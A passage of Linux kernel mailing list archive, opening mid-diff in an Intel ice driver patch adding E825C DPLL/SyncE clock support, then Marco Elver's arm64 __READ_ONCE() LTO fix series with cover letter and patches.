ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). + * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. */ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct ice_pf *pf) mutex_destroy(&d->lock); dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if (pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as recovered clock source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. + * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
The implementation of __READ_ONCE() under CONFIG_LTO=y incorrectly qualified the fallback "once" access for types larger than 8 bytes, which are not atomic but should still happen "once" and suppress common compiler optimizations. The cast `volatile typeof(__x)` applied the volatile qualifier to the pointer type itself rather than the pointee. This created a volatile pointer to a non-volatile type, which violated __READ_ONCE() semantics. Fix this by casting to `volatile typeof(*__x) *`. With a defconfig + LTO + debug options build, we see the following functions to be affected: xen_manage_runstate_time (884 -> 944 bytes) xen_steal_clock (248 -> 340 bytes) ^-- use __READ_ONCE() to load vcpu_runstate_info structs Fixes: e35123d83ee3 ("arm64: lto: Strengthen READ_ONCE() to acquire when CONFIG_LTO=y") Cc: <stable@vger.kernel.org> Reviewed-by: Boqun Feng <boqun@kernel.org> Signed-off-by: Marco Elver <elver@google.com> --- arch/arm64/include/asm/rwonce.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index 78beceec10cd..fc0fb42b0b64 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -58,7 +58,7 @@ default: \ atomic = 0; \ } \ - atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(__x))__x);\ + atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(*__x) *)__x);\ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:24 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
Rework arm64 LTO __READ_ONCE() to improve code generation as follows: 1. Replace _Generic-based __unqual_scalar_typeof() with more complete __rwonce_typeof_unqual(). This strips qualifiers from all types, not just integer types, which is required to be able to assign (must be non-const) to __u.__val in the non-atomic case (required for #2). Once our minimum compiler versions are bumped, this just becomes TYPEOF_UNQUAL() (or typeof_unqual() should we decide to adopt C23 naming). Sadly the fallback version of __rwonce_typeof_unqual() cannot be used as a general TYPEOF_UNQUAL() fallback (see code comments). One subtle point here is that non-integer types of __val could be const or volatile within the union with the old __unqual_scalar_typeof(), if the passed variable is const or volatile. This would then result in a forced load from the stack if __u.__val is volatile; in the case of const, it does look odd if the underlying storage changes, but the compiler is told said member is "const" -- it smells like UB. 2. Eliminate the atomic flag and ternary conditional expression. Move the fallback volatile load into the default case of the switch, ensuring __u is unconditionally initialized across all paths. The statement expression now unconditionally returns __u.__val. This refactoring appears to help the compiler improve (or fix) code generation. With a defconfig + LTO + debug options builds, we observe different codegen for the following functions: btrfs_reclaim_sweep (708 -> 1032 bytes) btrfs_sinfo_bg_reclaim_threshold_store (200 -> 204 bytes) check_mem_access (3652 -> 3692 bytes) [inlined bpf_map_is_rdonly] console_flush_all (1268 -> 1264 bytes) console_lock_spinning_disable_and_check (180 -> 176 bytes) igb_add_filter (640 -> 636 bytes) igb_config_tx_modes (2404 -> 2400 bytes) kvm_vcpu_on_spin (480 -> 476 bytes) map_freeze (376 -> 380 bytes) netlink_bind (1664 -> 1656 bytes) nmi_cpu_backtrace (404 -> 400 bytes) set_rps_cpu (516 -> 520 bytes) swap_cluster_readahead (944 -> 932 bytes) tcp_accecn_third_ack (328 -> 336 bytes) tcp_create_openreq_child (1764 -> 1772 bytes) tcp_data_queue (5784 -> 5892 bytes) tcp_ecn_rcv_synack (620 -> 628 bytes) xen_manage_runstate_time (944 -> 896 bytes) xen_steal_clock (340 -> 296 bytes) Increase of some functions are due to more aggressive inlining due to better codegen (in this build, e.g. bpf_map_is_rdonly is no longer present due to being inlined completely). Signed-off-by: Marco Elver <elver@google.com> --- v3: * Comment. v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. --- arch/arm64/include/asm/rwonce.h | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index fc0fb42b0b64..42c9e8429274 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -19,6 +19,20 @@ "ldapr" #sfx "\t" #regs, \ ARM64_HAS_LDAPR) +#ifdef USE_TYPEOF_UNQUAL +#define __rwonce_typeof_unqual(x) TYPEOF_UNQUAL(x) +#else +/* + * Fallback for older compilers (Clang < 19). + * + * Uses the fact that, for all supported Clang versions, 'auto' correctly drops + * qualifiers. Unlike typeof_unqual(), the type must be completely defined, i.e. + * no forward-declared struct pointer dereferences. The array-to-pointer decay + * case does not matter for usage in READ_ONCE() either. + */ +#define __rwonce_typeof_unqual(x) typeof(({ auto ____t = (x); ____t; })) +#endif + /* * When building with LTO, there is an increased risk of the compiler * converting an address dependency headed by a READ_ONCE() invocation @@ -32,8 +46,7 @@ #define __READ_ONCE(x) \ ({ \ typeof(&(x)) __x = &(x); \ - int atomic = 1; \ - union { __unqual_scalar_typeof(*__x) __val; char __c[1]; } __u; \ + union { __rwonce_typeof_unqual(*__x) __val; char __c[1]; } __u; \ switch (sizeof(x)) { \ case 1: \ asm volatile(__LOAD_RCPC(b, %w0, %1) \ @@ -56,9 +69,9 @@ : "Q" (*__x) : "memory"); \ break; \ default: \ - atomic = 0; \ + __u.__val = *(volatile typeof(*__x) *)__x; \ } \ - atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(*__x) *)__x);\ + __u.__val; \ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:25 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
When enabling Clang's Context Analysis (aka. Thread Safety Analysis) on kernel/futex/core.o (see Peter's changes at [1]), in arm64 LTO builds we could see: | kernel/futex/core.c:982:1: warning: spinlock 'atomic ? __u.__val : q->lock_ptr' is still held at the end of function [-Wthread-safety-analysis] | 982 | } | | ^ | kernel/futex/core.c:976:2: note: spinlock acquired here | 976 | spin_lock(lock_ptr); | | ^ | kernel/futex/core.c:982:1: warning: expecting spinlock 'q->lock_ptr' to be held at the end of function [-Wthread-safety-analysis] | 982 | } | | ^ | kernel/futex/core.c:966:6: note: spinlock acquired here | 966 | void futex_q_lockptr_lock(struct futex_q *q) | | ^ | 2 warnings generated. Where we have: extern void futex_q_lockptr_lock(struct futex_q *q) __acquires(q->lock_ptr); .. void futex_q_lockptr_lock(struct futex_q *q) { spinlock_t *lock_ptr; /* * See futex_unqueue() why lock_ptr can change. */ guard(rcu)(); retry: spin_lock(lock_ptr); ... } At the time of the above report (prior to removal of the 'atomic' flag), Clang Thread Safety Analysis's alias analysis resolved 'lock_ptr' to 'atomic ? __u.__val : q->lock_ptr' (now just '__u.__val'), and used this as the identity of the context lock given it cannot "see through" the inline assembly; however, we want 'q->lock_ptr' as the canonical context lock. While for code generation the compiler simplified to '__u.__val' for pointers (8 byte case -> 'atomic' was set), TSA's analysis (a) happens much earlier on the AST, and (b) would be the wrong deduction. Now that we've gotten rid of the 'atomic' ternary comparison, we can return '__u.__val' through a pointer that we initialize with '&x', but then update via a pointer-to-pointer. When READ_ONCE()'ing a context lock pointer, TSA's alias analysis does not invalidate the initial alias when updated through the pointer-to-pointer, and we make it effectively "see through" the __READ_ONCE(). Code generation is unchanged. Link: https://lkml.kernel.org/r/20260121110704.221498346@infradead.org [1] Reported-by: kernel test robot <lkp@intel.com> Closes: https://lore.kernel.org/oe-kbuild-all/202601221040.TeM0ihff-lkp@intel.com/ Cc: Peter Zijlstra <peterz@infradead.org> Tested-by: Boqun Feng <boqun@kernel.org> Signed-off-by: Marco Elver <elver@google.com> --- v3: * Use 'typeof(*__ret)'. * Commit message. v2: * Rebase. --- 